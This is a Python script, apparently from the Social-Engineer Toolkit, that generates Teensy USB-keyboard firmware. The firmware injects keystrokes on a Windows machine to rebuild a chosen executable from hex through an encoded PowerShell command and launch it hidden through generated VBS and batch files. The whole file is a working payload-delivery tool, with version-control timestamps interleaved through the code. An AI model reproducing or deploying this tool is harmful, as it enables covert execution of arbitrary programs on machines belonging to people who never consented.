2012-12-31 22:11:37 +00:00
#!/usr/bin/python
import binascii , base64 , sys , os , random , string , subprocess , socket
from src . core . setcore import *
from src . core . dictionaries import *
from src . core . menu . text import *
################################################################################################
#
# BSIDES LV SDCARD to Teensy Creator
#
# by Josh Kelley (@winfang98)
# Dave Kennedy (@dave_rel1k)
#
################################################################################################
################################################################################################
################################################################################################
# print main stuff for the application
print """
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
BSIDES Las Vegas - - - - SDCard to Teensy Creator
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Written by : Josh Kelley ( @winfang98 ) and Dave Kennedy ( ReL1K , @dave_rel1k )
This tool will read in a file from the Teensy SDCard , not mount it via
Windows and perform a hex to binary conversion via Powershell . It requires
you to have a Teensy device with a soldered USB device on it and place the
file that this tool outputs in order to successfully complete the task .
It works by reading natively off the SDCard into a buffer space thats then
2013-03-16 19:47:25 +00:00
written out through the keyboard .
2012-12-31 22:11:37 +00:00
"""
# if we hit here we are good since msfpayload is installed
print """
. - . . - . . . . - . . - . . - . . - . . - . . . . - . . - . . - .
| . . | - | | \| | . . ` - . | | - | ( | \/ | | | | ) | -
` - ' ` ' ' ` `- ' ` - ' ' ` - ' ' ' ' ` ` - ' `- ' ` - '
enabled . \n """
# grab the path and filename from user
path = raw_input ( setprompt ( [ " 6 " ] , " Path to the file you want deployed on the teensy SDCard " ) )
2013-03-16 19:47:25 +00:00
if not os . path . isfile ( path ) :
while 1 :
print_warning ( " Filename not found, try again " )
path = raw_input ( setprompt ( [ " 6 " ] , " Path to the file you want deployed on the teensy SDCard " ) )
if os . path . isfile ( path ) : break
2012-12-31 22:11:37 +00:00
print_warning ( " Note: This will only deliver the payload, you are in charge of creating the listener if applicable. " )
print_status ( " Converting the executable to a hexadecimal form to be converted later... " )
fileopen = file ( path , " rb " )
data = fileopen . read ( )
data = binascii . hexlify ( data )
filewrite = file ( " converts.txt " , " w " )
filewrite . write ( data )
print " [*] File converted successfully. It has been expored in the working directory under ' converts.txt ' . Copy this one file to the teensy SDCard. "
output_variable = " /* \n Teensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K) \n Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile \n */ \n \n "
# this is used to write out the file
random_filename = generate_random_string ( 8 , 15 ) + " .txt "
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode ( " $s=gc \" $HOME \\ AppData \\ Local \\ Temp \\ %s \" ;$s=[string]::Join( ' ' ,$s);$s=$s.Replace( ' `r ' , ' ' ); $s=$s.Replace( ' `n ' , ' ' );$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)| %% { $b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes( \" $HOME \\ AppData \\ Local \\ Temp \\ %s .exe \" ,$b) " % ( random_filename , random_filename ) )
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = " "
# loop through each character and insert null byte
for char in powershell_command :
# insert the nullbyte
blank_command + = char + " \x00 "
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64 . b64encode ( powershell_command )
# vbs filename
vbs = generate_random_string ( 10 , 15 ) + " .vbs "
# .batch filename
bat = generate_random_string ( 10 , 15 ) + " .bat "
# write the rest of the teensy code
output_variable + = ( """
#include <avr/pgmspace.h>
#include <SD.h>
/ / Teensy + + LED is 6. Teensy the LED is 11.
int ledPin = 6 ;
void setup ( )
{
BlinkFast ( 2 ) ;
delay ( 5000 ) ;
CommandAtRunBar ( " cmd /c echo 0 > %% TEMP %% \\ \\ %s " ) ;
delay ( 750 ) ;
CommandAtRunBar ( " notepad %% TEMP %% \\ \\ %s " ) ;
delay ( 1000 ) ;
/ / Delete the 0
PRES ( KEY_DELETE ) ;
/ / This is the SS pin on the Teensy . Pin 20 on the Teensy + + . Pin 0 on the Teensy .
const int chipSelect = 20 ;
/ / make sure that the default chip select pin is set to
/ / output , even if you don ' t use it:
pinMode ( 10 , OUTPUT ) ;
/ / see if the card is present and can be initialized :
if ( ! SD . begin ( chipSelect ) ) {
Keyboard . println ( " Card failed, or not present " ) ;
/ / don ' t do anything more:
return ;
}
/ / open the file . note that only one file can be open at a time ,
/ / so you have to close this one before opening another .
/ / Larger the file , more likely it wouldn ' t fit in a normal int var.
/ / This is the workaround for it .
long int filePos ;
long int fileSize ;
File dataFile = SD . open ( " converts.txt " ) ;
if ( dataFile ) {
fileSize = dataFile . size ( ) ;
for ( filePos = 0 ; filePos < = fileSize ; filePos + + ) {
Keyboard . print ( dataFile . read ( ) , BYTE ) ;
delay ( 10 ) ;
}
dataFile . close ( ) ;
2013-03-16 19:47:25 +00:00
}
2012-12-31 22:11:37 +00:00
else {
Keyboard . println ( " error opening converts.txt " ) ;
}
/ / ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST !
delay ( 5000 ) ;
CtrlS ( ) ;
delay ( 2000 ) ;
AltF4 ( ) ;
delay ( 5000 ) ;
/ / Cannot pass entire encoded command because of the start run length
/ / run through cmd
CommandAtRunBar ( " cmd " ) ;
delay ( 1000 ) ;
Keyboard . println ( " powershell -EncodedCommand %s " ) ;
/ / Tweak this delay . Larger files take longer to decode through powershell .
2013-03-16 19:47:25 +00:00
delay ( 10000 ) ;
2012-12-31 22:11:37 +00:00
Keyboard . println ( " echo Set WshShell = CreateObject( \\ " WScript . Shell \\" ) > %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " echo WshShell.Run chr(34) ^& \\ " % % TEMP % % \\\\% s \\" ^& Chr(34), 0 >> %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " echo Set WshShell = Nothing >> %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " echo %% TEMP %% \\ \\ %s .exe > %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " wscript %% TEMP %% \\ \\ %s " ) ;
delay ( 1000 ) ;
Keyboard . println ( " exit " ) ;
}
void loop ( ) { }
void BlinkFast ( int BlinkRate ) {
int BlinkCounter = 0 ;
for ( BlinkCounter = 0 ; BlinkCounter != BlinkRate ; BlinkCounter + + ) {
digitalWrite ( ledPin , HIGH ) ;
delay ( 80 ) ;
digitalWrite ( ledPin , LOW ) ;
delay ( 80 ) ;
}
}
void AltF4 ( ) {
Keyboard . set_modifier ( MODIFIERKEY_ALT ) ;
Keyboard . set_key1 ( KEY_F4 ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
void CtrlS ( ) {
Keyboard . set_modifier ( MODIFIERKEY_CTRL ) ;
Keyboard . set_key1 ( KEY_S ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
/ / Taken from IronGeek
void CommandAtRunBar ( char * SomeCommand ) {
2013-03-16 19:47:25 +00:00
Keyboard . set_modifier ( 128 ) ;
Keyboard . set_key1 ( KEY_R ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
2012-12-31 22:11:37 +00:00
delay ( 1500 ) ;
Keyboard . print ( SomeCommand ) ;
Keyboard . set_key1 ( KEY_ENTER ) ;
Keyboard . send_now ( ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
void PRES ( int KeyCode ) {
Keyboard . set_key1 ( KeyCode ) ;
Keyboard . send_now ( ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,bat,vbs))
# delete temporary file
subprocess . Popen ( " rm %s 1> /dev/null 2>/dev/null " % ( random_filename ) , shell = True ) . wait ( )
print " [*] Binary to Teensy file exported as teensy.pde "
# write the teensy.pde file out
filewrite = file ( " teensy.pde " , " w " )
# write the teensy.pde file out
filewrite . write ( output_variable )
# close the file
filewrite . close ( )
print """
Instructions :
Copy the converts . txt file to the sdcard on the Teensy device . Use the teensy . pde normally
and use the Arduino IDE to place the latest code in there . Notice that you need to change
some code marked above based on the Teensy and the Teensy + + based on how you soldered the PIN ' s
2013-03-16 19:47:25 +00:00
on .
2012-12-31 22:11:37 +00:00
Happy hacking .
"""
return_continue ( )
